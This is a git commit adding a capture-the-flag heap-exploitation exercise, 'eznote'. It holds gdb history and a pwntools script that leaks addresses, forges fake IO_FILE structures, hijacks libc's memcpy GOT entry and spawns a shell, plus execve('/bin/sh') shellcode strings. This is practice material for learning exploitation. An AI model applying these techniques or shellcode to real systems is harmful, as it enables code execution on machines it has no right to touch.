提交
0d064da9
编写于
8月 25, 2023
作者:
_sky123_
update
上级
b2dec691
变更
10
Showing
10 changed file
with
344 addition
and
0 deletion
+344
-0
glibc_pwn/eznoted2b1405e/.gdb_history
glibc_pwn/eznoted2b1405e/.gdb_history
+119
-0
glibc_pwn/eznoted2b1405e/.idea/.gitignore
glibc_pwn/eznoted2b1405e/.idea/.gitignore
+3
-0
glibc_pwn/eznoted2b1405e/.idea/eznoted2b1405e.iml
glibc_pwn/eznoted2b1405e/.idea/eznoted2b1405e.iml
+8
-0
glibc_pwn/eznoted2b1405e/.idea/inspectionProfiles/profiles_settings.xml
...ted2b1405e/.idea/inspectionProfiles/profiles_settings.xml
+6
-0
glibc_pwn/eznoted2b1405e/.idea/misc.xml
glibc_pwn/eznoted2b1405e/.idea/misc.xml
+4
-0
glibc_pwn/eznoted2b1405e/.idea/modules.xml
glibc_pwn/eznoted2b1405e/.idea/modules.xml
+8
-0
glibc_pwn/eznoted2b1405e/eznote
glibc_pwn/eznoted2b1405e/eznote
+0
-0
glibc_pwn/eznoted2b1405e/eznote.py
glibc_pwn/eznoted2b1405e/eznote.py
+196
-0
glibc_pwn/eznoted2b1405e/ld-linux-x86-64.so.2
glibc_pwn/eznoted2b1405e/ld-linux-x86-64.so.2
+0
-0
glibc_pwn/eznoted2b1405e/libc.so.6
glibc_pwn/eznoted2b1405e/libc.so.6
+0
-0
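--- a/glibc_pwn/eznoted2b1405e/.gdb_history
+++ b/glibc_pwn/eznoted2b1405e/.gdb_history
@@ -0,0 +1,119 @@
+vmmap
+q
+vmmap
+p/x 0x7f431ff2d000-0x7f431ff54000
+p/x -0x7f431ff2d000+0x7f431ff54000
+p _IO_str_jumps
+p &_IO_str_jumps
+p/x 0x7f4320148640-0x7f431ff54000
+q
+got
+libc
+telescope 0x7f0c4f0a7000
+vmmap
+telescope 0x7f0c4f299000
+memcpyx/30i 0x7f0c4f2242c0
+x/30i 0x7f0c4f2242c0
+p memcpy
+x/20i 0x7f0c4f1458c0
+vmmap
+p/x 0x219160+0x7f0c4f0a7000
+telescope 0x7f0c4f2c0160
+vmmap
+p/x 0x7f0c4f0a7000+0x1F2160
+telescope 0x7f0c4f299160
+q
+c
+k
+p _IO_list_all
+fp 0x557d0419bb90
+c
+k
+ni
+p fp
+ni
+bins
+ni
+bins
+ni
+bins
+telescope 0x557d0419cc40
+ni
+x/s 0x557d0419b010
+telescope 0x557d0419b010
+ni
+bins
+telescope 0x557d0419b010-0x10
+q
+c
+c
+n
+bins
+telescope 0x5569618e2c40-0x10
+ni
+telescope 0x5569618e1010
+telescope 0x5569618e2c40-0x10
+bins
+ni
+bins
+p __free_hook
+telescope 0x5569618e2c40-0x10
+ni
+telescope 0x5569618e2c40-0x10
+bins
+telescope 0x5569618e1010
+heap
+telescope 0x5569618e1010
+x/20gx 0x5569618e1010
+ni
+c
+ni
+bins
+niq
+q
+c
+c
+bins
+ni
+n
+bins
+n
+ni
+vmmap
+p fp
+p *fp
+ni
+c
+n
+k
+n
+bins
+ni
+ni
+p old_buf
+telescope 0x55ccca5b8790
+ni
+bins
+ni
+c
+ni
+n
+bins
+ni
+ni
+x/20i 0x7f2cf6e22cc0
+telescope 0x55ccca5b9830
+telescope 0x7f2cf6e9b150
+NI
+ni
+telescope 0x7f2cf6e9b150
+ni
+p fp
+p *fp
+ni
+ni
+n
+c
+n
+ni
+q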
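--- a/glibc_pwn/eznoted2b1405e/.idea/.gitignore
+++ b/glibc_pwn/eznoted2b1405e/.idea/.gitignore
@@ -0,0 +1,3 @@
+# 默认忽略的文件
+/shelf/
+/workspace.xml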
glibc_pwn/eznoted2b1405e/.idea/eznoted2b1405e.iml
0 → 100644
<?xml version="1.0" encoding="UTF-8"?>
<module
type=
"PYTHON_MODULE"
version=
"4"
>
<component
name=
"NewModuleRootManager"
>
<content
url=
"file://$MODULE_DIR$"
/>
<orderEntry
type=
"jdk"
jdkName=
"Python 2.7"
jdkType=
"Python SDK"
/>
<orderEntry
type=
"sourceFolder"
forTests=
"false"
/>
</component>
</module>
\ No newline at end of file
glibc_pwn/eznoted2b1405e/.idea/inspectionProfiles/profiles_settings.xml
0 → 100644
<component
name=
"InspectionProjectProfileManager"
>
<settings>
<option
name=
"USE_PROJECT_PROFILE"
value=
"false"
/>
<version
value=
"1.0"
/>
</settings>
</component>
\ No newline at end of file
glibc_pwn/eznoted2b1405e/.idea/misc.xml
0 → 100644
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"ProjectRootManager"
version=
"2"
project-jdk-name=
"Python 2.7"
project-jdk-type=
"Python SDK"
/>
</project>
\ No newline at end of file
glibc_pwn/eznoted2b1405e/.idea/modules.xml
0 → 100644
<?xml version="1.0" encoding="UTF-8"?>
<project
version=
"4"
>
<component
name=
"ProjectModuleManager"
>
<modules>
<module
fileurl=
"file://$PROJECT_DIR$/.idea/eznoted2b1405e.iml"
filepath=
"$PROJECT_DIR$/.idea/eznoted2b1405e.iml"
/>
</modules>
</component>
</project>
\ No newline at end of file
glibc_pwn/eznoted2b1405e/eznote
0 → 100755
文件已添加
glibc_pwn/eznoted2b1405e/eznote.py
0 → 100755
# _*_ coding:utf-8 _*_
from
pwn
import
*
# context.log_level='debug'
p
=
process
(
"./eznote"
)
elf
=
ELF
(
"./eznote"
)
libc
=
ELF
(
"./libc.so.6"
)
def
dbg
():
gdb
.
attach
(
p
)
pause
()
# -----------------------------------------------------------------------------------------
s
=
lambda
data
:
p
.
send
(
str
(
data
))
sa
=
lambda
text
,
data
:
p
.
sendafter
(
text
,
str
(
data
))
sl
=
lambda
data
:
p
.
sendline
(
str
(
data
))
sla
=
lambda
text
,
data
:
p
.
sendlineafter
(
text
,
str
(
data
))
r
=
lambda
num
=
4096
:
p
.
recv
(
num
)
ru
=
lambda
text
:
p
.
recvuntil
(
text
)
uu32
=
lambda
:
u32
(
p
.
recvuntil
(
"
\xf7
"
)[
-
4
:].
ljust
(
4
,
"
\x00
"
))
uu64
=
lambda
:
u64
(
p
.
recvuntil
(
"
\x7f
"
)[
-
6
:].
ljust
(
8
,
"
\x00
"
))
lg
=
lambda
s
:
p
.
success
(
'%s -> 0x%x'
%
(
s
,
eval
(
s
)))
sh_x86_18
=
"
\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
"
sh_x86_20
=
"
\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
"
sh_x64_21
=
"
\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05
"
# https://www.exploit-db.com/shellcodes
# -----------------------------------------------------------------------------------------
def
add
(
size
,
con
):
sla
(
"> "
,
1
)
sla
(
"Size: "
,
size
)
p
.
sendlineafter
(
"Content: "
,
con
)
def
edit
(
idx
,
con
):
sla
(
"> "
,
3
)
sla
(
"Idx: "
,
idx
)
p
.
sendlineafter
(
"Content: "
,
con
)
def
show
(
idx
):
sla
(
"> "
,
4
)
sla
(
"Idx: "
,
idx
)
def
dele
(
idx
):
sla
(
"> "
,
2
)
sla
(
"Idx: "
,
idx
)
add
(
0x438
,
'0'
*
0x438
)
# 0
add
(
0x408
,
'1'
*
0x408
)
# 1
add
(
0x448
,
'2'
*
0x448
)
# 2
add
(
0x418
,
'3'
*
0x418
)
# 3
add
(
0x418
,
'4'
*
0x418
)
# 4
add
(
0x408
,
'5'
*
0x408
)
# 5
add
(
0x408
,
'6'
*
0x408
)
# 6
add
(
0xca1
,
'a'
)
# 7
dele
(
0
)
dele
(
3
)
# 0123
add
(
0x438
,
'a'
*
0x438
)
# 0
add
(
0x408
,
'a'
*
0x400
)
# 3-1
dele
(
1
)
show
(
3
)
ru
(
'Note3:
\n
'
)
key
=
u64
(
p
.
recv
(
5
).
ljust
(
8
,
'
\x00
'
))
lg
(
'key'
)
heap_base
=
key
<<
12
lg
(
'heap_base'
)
add
(
0x448
,
'a'
*
0x448
)
# 1-2
dele
(
4
)
# 3and4
add
(
0x838
,
'a'
*
0x838
)
# 4-3and4
dele
(
2
)
show
(
1
)
libc_base
=
libc
.
address
=
uu64
()
-
0x219ce0
+
0x27000
log
.
info
(
"libc base: "
+
hex
(
libc_base
))
IO_list_all
=
libc
.
sym
[
'_IO_list_all'
]
IO_str_jumps
=
libc
.
address
+
0x1f4640
memcpy_got
=
libc
.
address
+
0x01F2160
# libc.got['memcpy']
memset
=
libc
.
sym
[
'memset'
]
system
=
libc
.
sym
[
'system'
]
lg
(
'IO_list_all'
)
#gdb.attach(p,"b *_IO_flush_all_lockp\nb *_IO_str_overflow")
#pause()
# -----------------------------------------------------------------
add
(
0x1000
,
'a'
*
0x1000
)
# 2
edit
(
1
,
p64
(
libc_base
+
0x21a0e0
+
0x27000
)
*
2
+
p64
(
0
)
+
p64
(
IO_list_all
-
0x20
))
dele
(
0
)
add
(
0x1000
,
'a'
*
0x1000
)
# 0
dele
(
0
)
add
(
0x438
,
'a'
*
0x438
)
# 0
# -----------------------------------------------------------------
new_size
=
0x408
copy_heap_addr
=
heap_base
+
0x10
next_chain
=
heap_base
+
0x2d00
-
0x10
old_blen
=
(
new_size
-
100
)
//
2
fake_IO_FILE
=
p64
(
0
)
*
2
fake_IO_FILE
+=
p64
(
0
)
# _IO_write_base = 0
fake_IO_FILE
+=
p64
(
0xffffffffffffffff
)
# _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE
+=
p64
(
0
)
fake_IO_FILE
+=
p64
(
copy_heap_addr
)
# _IO_buf_base
fake_IO_FILE
+=
p64
(
copy_heap_addr
+
old_blen
)
# _IO_buf_end
fake_IO_FILE
=
fake_IO_FILE
.
ljust
(
0x58
,
'
\x00
'
)
fake_IO_FILE
+=
p64
(
next_chain
)
# _chain
fake_IO_FILE
=
fake_IO_FILE
.
ljust
(
0x78
,
'
\x00
'
)
fake_IO_FILE
+=
p64
(
heap_base
)
# _lock = writable address
fake_IO_FILE
=
fake_IO_FILE
.
ljust
(
0xB0
,
'
\x00
'
)
fake_IO_FILE
+=
p64
(
0
)
# _mode = 0
fake_IO_FILE
=
fake_IO_FILE
.
ljust
(
0xC8
,
'
\x00
'
)
fake_IO_FILE
+=
p64
(
IO_str_jumps
)
# vtable
new_size
=
0x288
copy_heap_addr
=
heap_base
+
0x790
next_chain
=
heap_base
+
0x2dd0
-
0x10
old_blen
=
(
new_size
-
100
)
//
2
fake_IO_FILE2
=
p64
(
0
)
*
2
fake_IO_FILE2
+=
p64
(
0
)
# _IO_write_base = 0
fake_IO_FILE2
+=
p64
(
0xffffffffffffffff
)
# _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE2
+=
p64
(
0
)
fake_IO_FILE2
+=
p64
(
copy_heap_addr
)
# _IO_buf_base
fake_IO_FILE2
+=
p64
(
copy_heap_addr
+
old_blen
)
# _IO_buf_end
fake_IO_FILE2
=
fake_IO_FILE2
.
ljust
(
0x58
,
'
\x00
'
)
fake_IO_FILE2
+=
p64
(
next_chain
)
# _chain
fake_IO_FILE2
=
fake_IO_FILE2
.
ljust
(
0x78
,
'
\x00
'
)
fake_IO_FILE2
+=
p64
(
heap_base
)
# _lock = writable address
fake_IO_FILE2
=
fake_IO_FILE2
.
ljust
(
0xB0
,
'
\x00
'
)
fake_IO_FILE2
+=
p64
(
0
)
# _mode = 0
fake_IO_FILE2
=
fake_IO_FILE2
.
ljust
(
0xC8
,
'
\x00
'
)
fake_IO_FILE2
+=
p64
(
IO_str_jumps
)
# vtable
new_size
=
0x128
copy_heap_addr
=
heap_base
+
0x1830
next_chain
=
heap_base
+
0x2e90
old_blen
=
(
new_size
-
100
)
//
2
fake_IO_FILE3
=
p64
(
0
)
*
2
fake_IO_FILE3
+=
p64
(
0
)
# _IO_write_base = 0
fake_IO_FILE3
+=
p64
(
0xffffffffffffffff
)
# _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE3
+=
p64
(
0
)
fake_IO_FILE3
+=
p64
(
copy_heap_addr
)
# _IO_buf_base
fake_IO_FILE3
+=
p64
(
copy_heap_addr
+
old_blen
)
# _IO_buf_end
fake_IO_FILE3
=
fake_IO_FILE3
.
ljust
(
0x58
,
'
\x00
'
)
fake_IO_FILE3
+=
p64
(
next_chain
)
# _chain
fake_IO_FILE3
=
fake_IO_FILE3
.
ljust
(
0x78
,
'
\x00
'
)
fake_IO_FILE3
+=
p64
(
heap_base
)
# _lock = writable address
fake_IO_FILE3
=
fake_IO_FILE3
.
ljust
(
0xB0
,
'
\x00
'
)
fake_IO_FILE3
+=
p64
(
0
)
# _mode = 0
fake_IO_FILE3
=
fake_IO_FILE3
.
ljust
(
0xC8
,
'
\x00
'
)
fake_IO_FILE3
+=
p64
(
IO_str_jumps
)
# vtable
new_size
=
0x108
copy_heap_addr
=
libc_base
next_chain
=
0
old_blen
=
(
new_size
-
100
)
//
2
fake_IO_FILE4
=
p64
(
0
)
*
2
fake_IO_FILE4
+=
p64
(
0
)
# _IO_write_base = 0
fake_IO_FILE4
+=
p64
(
0xffffffffffffffff
)
# _IO_write_ptr = 0xffffffffffffffff
fake_IO_FILE4
+=
p64
(
0
)
fake_IO_FILE4
+=
p64
(
copy_heap_addr
)
# _IO_buf_base
fake_IO_FILE4
+=
p64
(
copy_heap_addr
+
old_blen
)
# _IO_buf_end
fake_IO_FILE4
=
fake_IO_FILE4
.
ljust
(
0x58
,
'
\x00
'
)
fake_IO_FILE4
+=
p64
(
next_chain
)
# _chain
fake_IO_FILE4
=
fake_IO_FILE4
.
ljust
(
0x78
,
'
\x00
'
)
fake_IO_FILE4
+=
p64
(
heap_base
)
# _lock = writable address
fake_IO_FILE4
=
fake_IO_FILE4
.
ljust
(
0xB0
,
'
\x00
'
)
fake_IO_FILE4
+=
p64
(
0
)
# _mode = 0
fake_IO_FILE4
=
fake_IO_FILE4
.
ljust
(
0xC8
,
'
\x00
'
)
fake_IO_FILE4
+=
p64
(
IO_str_jumps
)
# vtable
edit
(
3
,
p16
(
1
)
*
0x20
+
p64
(
memcpy_got
-
0x10
)
*
0x30
)
# 0x780 # tcache struct data 0x40/0xd0
edit
(
1
,
fake_IO_FILE
)
# 0xb90 largebin
edit
(
2
,
fake_IO_FILE2
+
fake_IO_FILE3
+
fake_IO_FILE4
)
# 0x1000
edit
(
5
,
'/bin/sh
\x00
'
*
2
+
p64
(
system
)
+
'
\x00
'
*
0x20
+
p64
(
memset
))
# 410
dele
(
6
)
# 0xc40
sla
(
"> "
,
5
)
p
.
interactive
()
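Review bot: The script only runs under Python 2 and nothing in the file says so: the send helpers wrap every payload in `str(data)`, and the payloads concatenate str literals with the bytes that `p64()` returns (e.g. `edit(5, '/bin/sh\x00' * 2 + p64(system) + '\x00' * 0x20 + p64(memset))`), which under Python 3 pwntools raises TypeError and would make `str(data)` send a bytes repr instead of the bytes. The `.idea/eznoted2b1405e.iml` added in the same commit pins a "Python 2.7" SDK, but the script itself should carry that constraint, e.g. a first line `#!/usr/bin/env python2` followed by `# Python 2 only: payload literals are str and are mixed with p64() output`. The `lg` helper resolves a variable name with `eval(s)`; a plain dictionary lookup does the same without an evaluator and fails loudly on a typo: `lg = lambda s: p.success('%s -> 0x%x' % (s, globals()[s]))`. The constants `0x219ce0`, `0x27000`, `0x1f4640` and `0x01F2160` are offsets into the bundled `libc.so.6` with no note of which glibc build they were read from, so a one-line comment naming that build would make the script reproducible against the shipped libc.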
glibc_pwn/eznoted2b1405e/ld-linux-x86-64.so.2
0 → 100755
文件已添加
glibc_pwn/eznoted2b1405e/libc.so.6
0 → 100755
文件已添加